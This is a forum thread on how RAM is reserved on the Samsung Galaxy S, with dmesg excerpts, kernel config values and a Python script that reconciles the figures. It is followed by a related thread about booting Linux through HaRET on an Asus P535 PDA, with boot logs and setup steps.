This is where our RAM is used - Galaxy S I9000 Android Development

Hi guys,
Not sure if this has been found yet, but in the dmesg logs you can see how the RAM on the Galaxy S is reserved.
This is from the JPK ROM:
[ 0.000000] S5PV210: PLL settings, A=800000000, M=667000000, E=96000000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x30ec2000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x40204000
[ 0.000000] s5pv210: 14680064 bytes system memory reserved for fimc0 at 0x42604000
[ 0.000000] s5pv210: 1048576 bytes system memory reserved for fimc1 at 0x43404000
[ 0.000000] s5pv210: 12582912 bytes system memory reserved for fimc2 at 0x43504000
[ 0.000000] s5pv210: 16777216 bytes system memory reserved for pmem at 0x332c2000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for pmem_gpu1 at 0x342c2000
[ 0.000000] s5pv210: 1536000 bytes system memory reserved for pmem_adsp at 0x34cc2000
[ 0.000000] s5pv210: 5132288 bytes system memory reserved for jpeg at 0x44104000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for texstream at 0x445e9000
[ 0.000000] s5pv210: 3145728 bytes system memory reserved for fimd at 0x44fe9000
[ 0.000000] s5pv210: 262144 bytes system memory reserved for wifi at 0x34e39000
[ 0.000000] Built 3 zonelists in Zone order, mobility grouping on. Total pages: 117856
[ 0.000000] Kernel command line: console=ttySAC2,115200 loglevel=4
[ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Memory: 80MB 256MB 128MB = 464MB total
[ 0.000000] Memory: 308048KB available (9224K code, 1910K data, 2868K init, 0K highmem)
I added up all the "system memory reserved for..." lines and got 151,633,920 bytes (144.6MB) reserved.
So the kernel can definitely see about 464MB of RAM in this case, but only 308,048KB is available.

hardcore said:
Hi guys,
Not sure if this has been found yet, but in the dmesg logs you can see how the RAM on the Galaxy S is reserved.
This is from the JPK ROM:
[ 0.000000] S5PV210: PLL settings, A=800000000, M=667000000, E=96000000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x30ec2000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x40204000
[ 0.000000] s5pv210: 14680064 bytes system memory reserved for fimc0 at 0x42604000
[ 0.000000] s5pv210: 1048576 bytes system memory reserved for fimc1 at 0x43404000
[ 0.000000] s5pv210: 12582912 bytes system memory reserved for fimc2 at 0x43504000
[ 0.000000] s5pv210: 16777216 bytes system memory reserved for pmem at 0x332c2000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for pmem_gpu1 at 0x342c2000
[ 0.000000] s5pv210: 1536000 bytes system memory reserved for pmem_adsp at 0x34cc2000
[ 0.000000] s5pv210: 5132288 bytes system memory reserved for jpeg at 0x44104000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for texstream at 0x445e9000
[ 0.000000] s5pv210: 3145728 bytes system memory reserved for fimd at 0x44fe9000
[ 0.000000] s5pv210: 262144 bytes system memory reserved for wifi at 0x34e39000
[ 0.000000] Built 3 zonelists in Zone order, mobility grouping on. Total pages: 117856
[ 0.000000] Kernel command line: console=ttySAC2,115200 loglevel=4
[ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.000000] Memory: 80MB 256MB 128MB = 464MB total
[ 0.000000] Memory: 308048KB available (9224K code, 1910K data, 2868K init, 0K highmem)
I added up all the "system memory reserved for..." lines and got 151,633,920 bytes (144.6MB) reserved.
So the kernel can definitely see about 464MB of RAM in this case, but only 308,048KB is available.
That's interesting. If we take the line:
Memory: 80MB 256MB 128MB = 464MB total as the total memory
So adding it all up:
((464 * 1024 (total memory)) - (9224 + 1910 + 2868 (reserved for kernel) + (144.6 * 1024 (reserved by system) ))) / 1024 = 306 MB (available for apps)
However we should be seeing 512Mb not 464 as the total, so we are missing 48 Mb somewhere.
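
The accounting from the two posts above, as an added example that is not part of the original thread. It parses the dmesg lines quoted in the first post, sums the reserved regions, checks whether they overlap or sit back to back, and follows the second post in counting kernel code, data and init as unavailable; the function names are made up for this example.

```python
import re

# dmesg lines copied from the first post in this thread (JPK ROM).
DMESG = """\
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x30ec2000
[ 0.000000] s5pv210: 37748736 bytes system memory reserved for mfc at 0x40204000
[ 0.000000] s5pv210: 14680064 bytes system memory reserved for fimc0 at 0x42604000
[ 0.000000] s5pv210: 1048576 bytes system memory reserved for fimc1 at 0x43404000
[ 0.000000] s5pv210: 12582912 bytes system memory reserved for fimc2 at 0x43504000
[ 0.000000] s5pv210: 16777216 bytes system memory reserved for pmem at 0x332c2000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for pmem_gpu1 at 0x342c2000
[ 0.000000] s5pv210: 1536000 bytes system memory reserved for pmem_adsp at 0x34cc2000
[ 0.000000] s5pv210: 5132288 bytes system memory reserved for jpeg at 0x44104000
[ 0.000000] s5pv210: 10485760 bytes system memory reserved for texstream at 0x445e9000
[ 0.000000] s5pv210: 3145728 bytes system memory reserved for fimd at 0x44fe9000
[ 0.000000] s5pv210: 262144 bytes system memory reserved for wifi at 0x34e39000
[ 0.000000] Memory: 80MB 256MB 128MB = 464MB total
[ 0.000000] Memory: 308048KB available (9224K code, 1910K data, 2868K init, 0K highmem)
"""

RESERVED_RE = re.compile(
    r"(\d+) bytes system memory reserved for (\S+) at (0x[0-9a-fA-F]+)")
TOTAL_RE = re.compile(r"Memory: .*= (\d+)MB total")
AVAIL_RE = re.compile(
    r"Memory: (\d+)KB available \((\d+)K code, (\d+)K data, (\d+)K init")


def parse_reserved(log):
    """Return (name, start_address, size_bytes) for every 'reserved for' line."""
    return [(name, int(addr, 16), int(size))
            for size, name, addr in RESERVED_RE.findall(log)]


def merge_runs(regions):
    """Merge back-to-back regions into address runs; reject overlapping ones."""
    runs = []
    for name, start, size in sorted(regions, key=lambda r: r[1]):
        end = start + size
        if runs and start < runs[-1]["end"]:
            raise ValueError(f"{name} overlaps {runs[-1]['names'][-1]}")
        if runs and start == runs[-1]["end"]:
            # Region begins exactly where the previous one ended: same run.
            runs[-1]["end"] = end
            runs[-1]["names"].append(name)
        else:
            runs.append({"start": start, "end": end, "names": [name]})
    return runs


def reconcile(log):
    """Compare total, reserved, kernel and available memory, all in KB."""
    regions = parse_reserved(log)
    total_m = TOTAL_RE.search(log)
    avail_m = AVAIL_RE.search(log)
    if not regions or not total_m or not avail_m:
        raise ValueError("log is missing the reserved or Memory: lines")
    reserved = sum(size for _, _, size in regions)
    total_kb = int(total_m.group(1)) * 1024
    avail_kb, code, data, init = (int(g) for g in avail_m.groups())
    kernel_kb = code + data + init  # same accounting as the second post
    return {
        "reserved_bytes": reserved,
        "total_kb": total_kb,
        "kernel_kb": kernel_kb,
        "available_kb": avail_kb,
        # What the quoted lines alone do not explain.
        "unaccounted_kb": total_kb - reserved // 1024 - kernel_kb - avail_kb,
    }


if __name__ == "__main__":
    for run in merge_runs(parse_reserved(DMESG)):
        size_mb = (run["end"] - run["start"]) / 2**20
        print(f"{run['start']:#010x}-{run['end']:#010x} {size_mb:6.1f} MB "
              f"{', '.join(run['names'])}")
    for key, value in reconcile(DMESG).items():
        print(f"{key:>15}: {value}")
```

On this log the twelve reservations collapse into two gap-free runs, one starting at 0x30ec2000 and one at 0x40204000, and the quoted lines leave 5006 KB of the 464MB unexplained.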

I still don't understand how the Galaxy Tab sees 444MB for actual applications.
http://www.youtube.com/watch?v=KoOWPjIel-c Look at 4:40 in this video. It clearly shows how much RAM the Tab is seeing.
Maybe we should poke inside the TAB's firmware to find out what is different?
The hardware is almost 1:1 with the SGS.

hardcore said:
Hi guys,
Not sure if this has been found yet, but in the dmesg logs you can see how the RAM on the Galaxy S is reserved.
Yes, see this thread starting here.

mtoneman said:
That's interesting. If we take the line:
Memory: 80MB 256MB 128MB = 464MB total as the total memory
So adding it all up:
((464 * 1024 (total memory)) - (9224 + 1910 + 2868 (reserved for kernel) + (144.6 * 1024 (reserved by system) ))) / 1024 = 306 MB (available for apps)
However we should be seeing 512Mb not 464 as the total, so we are missing 48 Mb somewhere.
It's probably the dalvik-cache!
Because "/system/build.prop" says: "dalvik.vm.heapsize=48m"
Just an idea

Any improvements if we set a higher value for dalvik heapsize?

MCOGW said:
It's probably the dalvik-cache!
Because "/system/build.prop" says: "dalvik.vm.heapsize=48m"
Just an idea
This is the max heapsize for a single VM...meaning
the single application can allocate max of 48Mb heap before it gets out of memory.
This has nothing to do with RAM reservation

MCOGW said:
It's probably the dalvik-cache!
Because "/system/build.prop" says: "dalvik.vm.heapsize=48m"
Just an idea
No, it's not the dalvik heapsize. Changing that value doesn't give us more usable RAM.
I'm wondering about the Tab too. I was playing with a prototype and it definitely had more accessible RAM, as one poster said - more than 400MB. Would be good to see the dmesg boot log from a Tab to see what the system reserved and total memory is.

According to this:
http://forum.xda-developers.com/showthread.php?t=792512&page=11
there are one 2GBit (256MByte) and 2 x 1GBit (128MByte each) RAM chips totalling 512MBytes on the board. What we need to find out is why the kernel is reporting "Memory: 80MB 256MB 128MB".
i.e. what happened to the 48MByte on one of the 1GBit modules.

hardcore said:
No, it's not the dalvik heapsize. Changing that value doesn't give us more usable RAM.
I don't think it's that easy to (really) modify this value. I think you need a JTAG to modify this because these are direct parameters for the (smdkc110) chip.
So how did you manage (and verify) this?

If you would have read this thread:
http://forum.xda-developers.com/showthread.php?t=792512
You probably have read this:
http://forum.xda-developers.com/showpost.php?p=8325266&postcount=18
Ok it is not directly a "blackhole", but it is reserved.
The SGS kernel config tells you a bit more for what it is reserved:
Code:
CONFIG_ANDROID_PMEM_MEMSIZE_PMEM=16384
CONFIG_ANDROID_PMEM_MEMSIZE_PMEM_GPU1=8192
CONFIG_ANDROID_PMEM_MEMSIZE_PMEM_ADSP=1800
...
CONFIG_VIDEO_SAMSUNG_MEMSIZE_FIMC0=12288
CONFIG_VIDEO_SAMSUNG_MEMSIZE_FIMC1=1024
CONFIG_VIDEO_SAMSUNG_MEMSIZE_FIMC2=12288
CONFIG_VIDEO_SAMSUNG_MEMSIZE_MFC0=32768
CONFIG_VIDEO_SAMSUNG_MEMSIZE_MFC1=32768
CONFIG_VIDEO_SAMSUNG_MEMSIZE_TEXSTREAM=10240
16 (16384)
+ 8 (8192)
+ 1,75 (1800)
+ 12 (12288)
+ 1 (1024)
+ 12 (12288)
+ 32 (32768)
+ 32 (32768)
+ 10 (10240)
112 mb
And 48 mb are not in the mem map, so 112+48 = 160
512-160=352mb
but we have a total of 325 mb (jm8)
352-325=27 are still missing
Have a look at /proc/iomem for these 27mb yourself.
And by reading that:
http://forum.xda-developers.com/showpost.php?p=8350492&postcount=126
jpk is only missing 32 mb = gpu.
So everything is fine on the ram amount, nothing to worry about.

Ok I just read up on the other threads (sorry missed those initially). If I understood correctly, the radio is separate and not visible to the linux kernel (unlike the other "reserved" blocks). This probably amounts to the 48MBytes we are not seeing in the Linux dmesg output.

Total guess: the difference in free ram between SGS and the Tab is probably that video ram for the SGS comes out of the system ram, while the Tab probably has a dedicated framebuffer+ram for its graphics, probably because it's required for the bigger screen.
Why does Froyo have less available ram than Eclair though (hardware is the same)? In fact, why do different Eclair versions have different available ram? Is this just tweaking, and if so, can we not tweak it ourselves?

RyanZA said:
Why does Froyo have less available ram than Eclair though (hardware is the same)? In fact, why do different Eclair versions have different available ram? Is this just tweaking, and if so, can we not tweak it ourselves?
Cause it is a different OS? With more or newer components taking various amounts of memory?
This is like saying "why does Windows 7 leave you with less available memory than Windows XP". Ummm because it is not XP.

brunes said:
Cause it is a different OS? With more or newer components taking various amounts of memory?
This is like saying "why does Windows 7 leave you with less available memory than Windows XP". Ummm because it is not XP.
Mmm, and why on Nexus one there is the same RAM available in Eclair and Froyo?
And Windows 7 shows exactly the same amount of total RAM available as Windows XP.

brunes,
You are wrong.

brunes said:
Cause it is a different OS? With more or newer components taking various amounts of memory?
This is like saying "why does Windows 7 leave you with less available memory than Windows XP". Ummm because it is not XP.
The 'OS' is Linux! It's always important to remember this. Android is just an ecosystem (a number of apps and services) running on top of stock linux. Just because Android has gone up a version, doesn't mean the underlying system has changed! Any changes to Android components are actually all far outside the kernel, and will use up the same ram as other userland apps.
The reserved memory has nothing to do with Android, and has everything to do with the hardware drivers. Since the hardware hasn't changed, the question is why the graphics and low level drivers have been allocated more ram in Froyo than in Eclair.
Possible explanations are that Samsung gave more ram to graphics to help with... something? Maybe OpenGL ES 2 needs more ram, and performs worse than OpenGL ES 1, and so the OpenGL ES 2 driver needs to eat up more ram now? Or the Froyo drivers might just be badly optimized. In any case, it seems like we can tweak this stuff, because Samsung can tweak it.
The question is, how do we tweak it? In the kernel video drivers? Are there open specs available that we could use to work it out? And more questions I can't think of...

Well actually comparing dmesg and iomem outputs from JM8 and JPK would answer a lot of questions.
Speculating is leading us nowhere.

xan said:
Well actually comparing dmesg and iomem outputs from JM8 and JPK would answer a lot of questions.
Speculating is leading us nowhere.
I think a very deep look at this http://opensource.samsung.com/ (and a search for "GT-I9000") would answer lots of questions (only for Eclair atm)...

MCOGW said:
I think a very deep look at this http://opensource.samsung.com/ (and a search for "GT-I9000") would answer lots of questions (only for Eclair atm)...
<sarcasm>Wow thanks for the link, I'm sure none of the devs on here have bothered to check!</sarcasm>

Related

Haret + Asus P535

Hello !
I have a PDA phone, an Asus P535 running Windows Mobile 6, on which I would like to try Linux.
Its characteristics:
-processor PXA270 520Mhz
-256Mo ROM
-64Mo RAM
-GPS SiRFStar III
-bluetooth
-Usb 1.1
-Wifi IEEE 802.11b+g
I have been trying since last week to launch a kernel image with Android Haret.exe; it does not work.
I have a black screen that appears with:
Haret boot
Shutting down hardware
Turning off MMU...
In preloader
PSR=600000df
Kernel relocated
initrd relocated
jumping to kernel...
Can you help me?
You should create the 'earlyharetlog.txt' file in the same directory as haret.exe
and run haret.exe
It will create the haretlog.txt file, which you may post here.
Haret = haretlog.txt
Thank you.
Could you tell me where I made a mistake?
Here is the file "log":
===== HaRET 0.5.1 =====
Setting KMode to true.
Old KMode was 1
Finished initializing output
Loading dynamically bound functions
Function '[email protected]@[email protected]@[email protected]' in library 'gx' at 0248D9EC
Function '[email protected]@YAHXZ' in library 'gx' at 0248DDD8
Function '[email protected]@YAPAXXZ' in library 'gx' at 0248D2A8
Function '[email protected]@YAHXZ' in library 'gx' at 0248D36C
Function 'LoadLibraryExW' in library 'coredll' at 03F65FE0
Function 'GetSystemPowerStatusEx2' in library 'coredll' at 03F6C9A8
Function 'SleepTillTick' in library 'coredll' at 03F65F00
Function 'AllocPhysMem' in library 'coredll' at 03F65E38
Function 'FreePhysMem' in library 'coredll' at 03F65EA4
Function 'CreateToolhelp32Snapshot' in library 'toolhelp' at 02E1505C
Function 'Process32First' in library 'toolhelp' at 02E15140
Function 'Process32Next' in library 'toolhelp' at 02E151AC
Function 'Module32First' in library 'toolhelp' at 02E15340
Function 'Module32Next' in library 'toolhelp' at 02E153B0
Function 'CloseToolhelp32Snapshot' in library 'toolhelp' at 02E1507C
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Unable to load library 'ace_ddi'
Detecting memory
WinCE reports memory size 67108864 (phys=53121024 store=171950080)
Detecting current machine
Trying to detect machine (Plat='PocketPC' OEM='Asus P535')
Wince reports processor: core=PXA270 name=520Mhz cat= vend=Intel
Looking at machine Alpine
Looking at machine Apache
Looking at machine AximX50
Looking at machine AximX5
Looking at machine Beetles
Looking at machine Blueangel
Looking at machine Himalaya
Looking at machine Magician
Looking at machine Universal
Looking at machine H1910
Looking at machine H1940
Looking at machine H2200
Looking at machine H3600b
Looking at machine H3700
Looking at machine H3870
Looking at machine H3900
Looking at machine H4000
Looking at machine H4300
Looking at machine H5000
Looking at machine H6340
Looking at machine HX2000
Looking at machine HX4700
Looking at machine Sable
Looking at machine Wizard
Looking at machine Hermes
Looking at machine Trinity
Looking at machine Athena
Looking at machine G500
Looking at machine Artemis
Looking at machine Herald
Looking at machine Prophet
Looking at machine RX3000
Looking at machine Treo700wx
Looking at machine e310
Looking at machine e740
Looking at machine Acer_n30
Looking at machine Mio_P550
Looking at machine Kaiser
Looking at machine Loox5xx
Looking at machine Jornada820
Looking at machine H3100
Looking at machine H3600a
Looking at machine Tornado
Looking at machine Libra
Looking at machine Generic Intel PXA27x
Looking at machine Generic Intel PXA
Looking at machine Generic TI OMAP
Looking at machine Generic TI OMAP15xx
Looking at machine Generic Samsung s3c24xx
Looking at machine Generic MSM7500
Looking at machine Generic ARM 920t
Looking at machine Generic ARM 926
Looking at machine Generic ARM v6
Looking at arch Generic Intel PXA27x
Registering command IGPIO
Registering command WG|PIO
Registering command GPLR
Registering command GPDR
Registering command GAFR
Registering command GPIO
Registering command GPIOST
Registering command LOADLIBRARYEX
Registering command TRACES
Registering command RESUMETRACES
Registering command WI|RQ
Registering command TRACE
Registering command TRACEMASK
Registering command TRACE2
Registering command TRACETYPE
Registering command TRACE2TYPE
Registering command TRACEFORWATCH
Registering command INSN
Registering command INSNREENABLE
Registering command INSNREG1
Registering command INSNREG2
Registering command INSN2
Registering command INSN2REENABLE
Registering command INSN2REG1
Registering command INSN2REG2
Registering command ALTL1TRACE
Registering command MAXL1TRACE
Registering command MAXL1TRACERESUME
Registering command MMUTRACE
Registering command TRACEIGNORE
Registering command PERMISSIVEMMUTRACE
Registering command KILL
Registering command PS
Registering command LSMOD
Registering command ADDR2MOD
Registering command AC97
Not registering command ATIDBG
Initializing for machine 'Generic Intel PXA27x'
HaRET(1)# set ramaddr 0xa0000000
HaRET(2)# addlist IRQS p2v(0x40D00000) 0x480 32 0
HaRET(3)# addlist IRQS p2v(0x40D0009c) 0xfffffffc 32 0
HaRET(4)# addlist IRQS p2v(0x40E00048) 0 32 0
HaRET(5)# addlist IRQS p2v(0x40E0004c) 0 32 0
HaRET(6)# addlist IRQS p2v(0x40E00050) 0 32 0
HaRET(7)# addlist IRQS p2v(0x40E00148) 0 32 0
HaRET(8)# addlist GPIOS p2v(0x40E00000)
HaRET(9)# addlist GPIOS p2v(0x40E00004)
HaRET(10)# addlist GPIOS p2v(0x40E00008)
HaRET(11)# addlist GPIOS p2v(0x40E00100)
HaRET(12)# addlist GPIOS p2v(0x40E0000C)
HaRET(13)# addlist GPIOS p2v(0x40E00010)
HaRET(14)# addlist GPIOS p2v(0x40E00014)
HaRET(15)# addlist GPIOS p2v(0x40E0010C)
HaRET(16)# addlist GPIOS p2v(0x40E00054)
HaRET(17)# addlist GPIOS p2v(0x40E00058)
HaRET(18)# addlist GPIOS p2v(0x40E0005c)
HaRET(19)# addlist GPIOS p2v(0x40E00060)
HaRET(20)# addlist GPIOS p2v(0x40E00064)
HaRET(21)# addlist GPIOS p2v(0x40E00068)
HaRET(22)# addlist GPIOS p2v(0x40E0006c)
HaRET(23)# addlist GPIOS p2v(0x40E00070)
HaRET(24)# newvar CLOCKS GPIOS 'Architecture clock registers'
HaRET(25)# addlist CLOCKS p2v(0x41300000)
HaRET(26)# addlist CLOCKS p2v(0x41300004)
HaRET(27)# addlist CLOCKS p2v(0x41300008)
HaRET(28)# addlist CLOCKS p2v(0x4130000C)
HaRET(29)# addlist CLOCKS cp 14 0 6 0 0
HaRET(30)# addlist CLOCKS cp 14 0 7 0 0
Welcome, this is HaRET 0.5.1 running on WindowsCE v5.2
Minimal virtual address: 00010000, maximal virtual address: 7FFFFFFF
Detected machine Generic Intel PXA27x/PXA27x (Plat='PocketPC' OEM='Asus P535')
CPU is Intel ARM arch 5TE revision 0 product 17 stepping 7 running in system mode
Enter 'HELP' for a short command summary.
Running WSAStartup
Starting gui
In initdialog
Found machine Generic Intel PXA27x
executing startup.txt
HaRET(1)# set mtype 535
HaRET(2)# set kernel "zImage"
HaRET(3)# boot
boot KERNEL=zImage INITRD=
Opening file zImage
boot params: RAMADDR=a0000000 RAMSIZE=04000000 MTYPE=535 CMDLINE='root=/dev/ram0 ro console=tty0'
Boot FB feedback: 1
Built virtual to physical page mapping
Allocated 307 pages (tags=4EC00000/a2309000 kernel=4EC01000/a2308000 initrd=4ED2F000/a21a1000 index=4ED2F000/a21a1000)
Built kernel tags area
Built page index
Video buffer at 48A00080 sx=240 sy=320 mx=60 my=53
Video Phys FB=5c000080 Fonts=a219f064
[email protected]/a219e000 sj=4ED32000 stack=4ED30000/a21a0000 data=4ED31000/a219f000 exec=a219e128
Reading 1235904 bytes...
Read complete
Launching to physical address a219e010
Trampoline setup ([email protected]/1e0241c0/a0b831c0)
MMU setup: mmu=A87D0000/a07d0000
Go Go Go...
To begin with, you need to dump gpio table and pxa27xlccr (with gnuharet).. and then make your own kernel. but you could try my kernel from asus p525
http://rapidshare.com/files/116299470/zImage.html
and yes, for it not to hang. use this startup.txt
set KERNEL zImage
set MTYPE 1554
set CMDLINE "debug rootdelay=10 root=/dev/ram0 console=tty0 fbcon=rotate:0 mem=64M"
boot2
sp3dev said:
To begin with, you need to dump gpio table and pxa27xlccr (with gnuharet)..
I've ported the 'dump pxa27x' command to mainline haret:
http://jornada820.sf.net/files/haret/haret-w.exe
but you could try my kernel from asus p525
I don't see asus 525 mentioned here
http://www.handhelds.org/moin/moin.cgi/SupportedHandheldSummary
Can you provide the kernel patch for it ?
yes, i mean dump pxa27xgpio of course.. i think i will add asus to hh cvs.. but not now. i've been rather busy. anyhow, i will need to clean the code and fix audio before it.
btw, could you help me with linux? actually, not with hardware (though i need some help with joystick and pca9535).. with qtopia.
btw, thanks for haret
Can anyone please post the whole package? I can't make it run.
thx
sp3dev said:
yes, i mean dump pxa27xgpio of course..
'dump pxa27x' in haret-w.exe includes the output of all 'dump pxa27x*' commands
in gnu-haret.
btw, could you help me with linux? actually, not with hardware (though i need some help with joystick and pca9535).. with qtopia.
I think you should take the qtopia image from universal, and set joystick key events
to match those used by universal.
If you run the kernel, please write message
Ok, ATM it seems only me and DaLiV are working on linux on p525. but we wouldnt mind anyone join us.
We have 2.6.21 kernel, correctly set up fb, partly working keypad, sd memory through pxa mmc driver, corgi-bl driver and touchscreen
Sound is working through pxa2xx-ac97, headphones only. need to set volume via alsamixer. we are working on wm9713 driver
The things that are to be done (the most important ones, in the decreasing order of importance)
UDC
Suspend
PCA9535 i2c
Bluetooth
Phone
Anyone who wants to test it
http://rapidshare.com/files/118520723/ln.tgz.html
http://familiar.handhelds.org/relea...0/gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar.bz2
Create an ext2 partition on your flash card (second partition, primary. or edit default.txt)
unpack (e.g. if your flash is - /media/usbdisk-1)
bunzip2 gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar.bz2
tar xvpf gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar -C /media/usbdisk-1
certainly, this is to be done under root. to keep permissions for all files
then,
sync
remove /lib/modules and replace with ours. the same is with /etc/modutils
That is all. just copy all files from 'kernel' dir to your pda and run haret.exe
And the log
[ 0.000000] Linux version 2.6.21-hh20 ([email protected]) (gcc version 4.2.1) #94 PREEMPT Fri May 30 21:25:16 MSD 2008
[ 0.000000] CPU: XScale-PXA270 [69054117] revision 7 (ARMv5TE), cr=0000397f
[ 0.000000] Machine: Asus P525
[ 0.000000] Memory policy: ECC disabled, Data cache writeback
[ 0.000000] On node 0 totalpages: 16384
[ 0.000000] DMA zone: 128 pages used for memmap
[ 0.000000] DMA zone: 0 pages reserved
[ 0.000000] DMA zone: 16256 pages, LIFO batch:3
[ 0.000000] Normal zone: 0 pages used for memmap
[ 0.000000] Run Mode clock: 208.00MHz (*16)
[ 0.000000] Turbo Mode clock: 208.00MHz (*1.0, active)
[ 0.000000] Memory clock: 104.00MHz (/2)
[ 0.000000] System bus clock: 208.00MHz
[ 0.000000] CPU0: D VIVT undefined 5 cache
[ 0.000000] CPU0: I cache: 32768 bytes, associativity 32, 32 byte lines, 32 sets
[ 0.000000] CPU0: D cache: 32768 bytes, associativity 32, 32 byte lines, 32 sets
[ 0.000000] Built 1 zonelists. Total pages: 16256
[ 0.000000] Kernel command line: debug rootdelay=10 root=/dev/mmcblk0p2 console=tty0 fbcon=rotate:0 mem=64M
[ 0.000000] PID hash table entries: 256 (order: 8, 1024 bytes)
[ 0.000000] Console: colour dummy device 80x30
[ 0.000000] Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.000000] Memory: 64MB = 64MB total
[ 0.000000] Memory: 61988KB available (2608K code, 182K data, 84K init)
[ 0.010000] Calibrating delay loop... 207.25 BogoMIPS (lpj=1036288)
[ 0.200000] Mount-cache hash table entries: 512
[ 0.200000] CPU: Testing write buffer coherency: ok
[ 0.200000] NET: Registered protocol family 16
[ 0.230000] usbcore: registered new interface driver usbfs
[ 0.230000] usbcore: registered new interface driver hub
[ 0.230000] usbcore: registered new device driver usb
[ 0.240000] Time: pxa_timer clocksource has been installed.
[ 0.240000] NET: Registered protocol family 2
[ 0.310000] IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.310000] TCP established hash table entries: 2048 (order: 2, 16384 bytes)
[ 0.310000] TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
[ 0.310000] TCP: Hash tables configured (established 2048 bind 2048)
[ 0.310000] TCP reno registered
[ 0.340000] PXA CPU frequency change support initialized
[ 0.340000] NetWinder Floating Point Emulator V0.97 (double precision)
[ 0.340000] JFFS2 version 2.2. (NAND) (C) 2001-2006 Red Hat, Inc.
[ 0.340000] io scheduler noop registered
[ 0.340000] io scheduler anticipatory registered (default)
[ 0.340000] io scheduler deadline registered
[ 0.350000] Corgi Backlight Driver Initialized.
[ 0.360000] Console: switching to colour frame buffer device 30x40
[ 0.450000] SA1100/PXA2xx Watchdog Timer: timer margin 60 sec
[ 0.450000] pxa2xx-uart.0: ttyS0 at MMIO 0x40100000 (irq = 22) is a FFUART
[ 0.450000] pxa2xx-uart.1: ttyS1 at MMIO 0x40200000 (irq = 21) is a BTUART
[ 0.460000] pxa2xx-uart.2: ttyS2 at MMIO 0x40700000 (irq = 20) is a STUART
[ 0.490000] RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize
[ 0.510000] loop: loaded (max 8 devices)
[ 0.520000] usbmon: debugfs is not available
[ 0.530000] ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver
[ 0.550000] usbcore: registered new interface driver usbhid
[ 0.560000] drivers/usb/input/hid-core.c: v2.6:USB HID core driver
[ 0.580000] pxa27x_udc: version 01-01-2006
[ 0.590000] UDC disconnected.
[ 0.600000] UDC disconnected.
[ 0.610000] ether gadget: using random self ethernet address
[ 0.620000] ether gadget: using random host ethernet address
[ 0.640000] usb0: Ethernet Gadget, version: May Day 2005
[ 0.650000] usb0: using pxa27x_udc, OUT ep2out-bulk IN ep1in-bulk STATUS ep3in-intr
[ 0.670000] usb0: MAC 0e:8c:22:12:b3:da
[ 0.680000] usb0: HOST MAC 06:2f:b7:42:8d:6e
[ 0.690000] usb0: RNDIS ready
[ 0.810000] UDC connect.
[ 0.810000] input: gpio-keys as /class/input/input0
[ 0.830000] input: pxa27x-keyboard as /class/input/input1
[ 0.840000] PXA27x keyboard controller enabled
[ 0.850000] sa1100-rtc sa1100-rtc: rtc intf: sysfs
[ 0.870000] sa1100-rtc sa1100-rtc: rtc intf: proc
[ 0.880000] sa1100-rtc sa1100-rtc: rtc intf: dev (254:0)
[ 0.890000] sa1100-rtc sa1100-rtc: rtc core: registered sa1100-rtc as rtc0
[ 0.910000] APM Battery Driver
[ 0.920000] min dma period: 1230768 ps, new clock 624000 kHz
[ 0.930000] min dma period: 1230768 ps, new clock 624000 kHz
[ 0.960000] Advanced Linux Sound Architecture Driver Version 1.0.14rc3 (Wed Mar 14 07:25:50 2007 UTC).
[ 1.040000] ALSA device list:
[ 1.050000] #0: pxa2xx-ac97 (Wolfson WM9713,WM9714)
[ 1.060000] TCP cubic registered
[ 1.070000] NET: Registered protocol family 1
[ 1.080000] NET: Registered protocol family 17
[ 1.090000] XScale iWMMXt coprocessor detected.
[ 1.100000] sa1100-rtc sa1100-rtc: setting the system clock to 1970-01-01 15:22:38 (55358)
[ 1.120000] Waiting 10sec before mounting root device...
[ 1.140000] mmcblk0: mmc0:b368 SD 501248KiB
[ 1.150000] mmcblk0: p1 p2 p3
[ 11.180000] EXT2-fs warning: mounting unchecked fs, running e2fsck is recommended
[ 11.200000] VFS: Mounted root (ext2 filesystem).
[ 11.210000] Freeing init memory: 84K
[ 46.750000] wm97xx: version 0.65 [email protected]
[ 46.780000] wm97xx: detected a wm9713 codec
[ 46.810000] input: wm97xx touchscreen as /class/input/input2
[ 46.840000] wm97xx: setting pen detect pull-up to 8000 Ohms
hi
tried on my o2zinc as it has the same processor, will report on any prog. thx
sp3dev said:
Anyone who wants to test it
http://rapidshare.com/files/118520723/ln.tgz.html
http://familiar.handhelds.org/relea...0/gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar.bz2
Create an ext2 partition on your flash card (second partition, primary. or edit default.txt)
unpack (e.g. if your flash is - /media/usbdisk-1)
bunzip2 gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar.bz2
tar xvpf gpe-image-v0.8.4-ipaq-pxa270.rootfs.tar -C /media/usbdisk-1
certainly, this is to be done under root. to keep permissions for all files
then,
sync
